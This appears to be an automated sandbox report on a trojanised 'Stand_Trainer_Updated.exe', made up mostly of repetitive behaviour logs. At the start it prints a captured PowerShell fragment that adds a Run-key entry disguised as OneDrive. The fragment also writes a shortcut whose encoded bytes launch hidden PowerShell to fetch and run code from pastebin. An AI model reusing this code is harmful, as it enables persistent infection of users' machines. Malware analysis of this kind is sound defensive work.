Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Memory allocated: 22D07BA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Memory allocated: 22D215A0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3094
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6703
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1384
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4221
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Backend.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe API coverage: 2.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5844 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 1384 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 Thread sleep count: 313 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep count: 132 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep count: 4921 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep count: 4874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 150 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836 Thread sleep count: 306 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 Thread sleep count: 5529 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep time: -922337203685477s >= -30000s
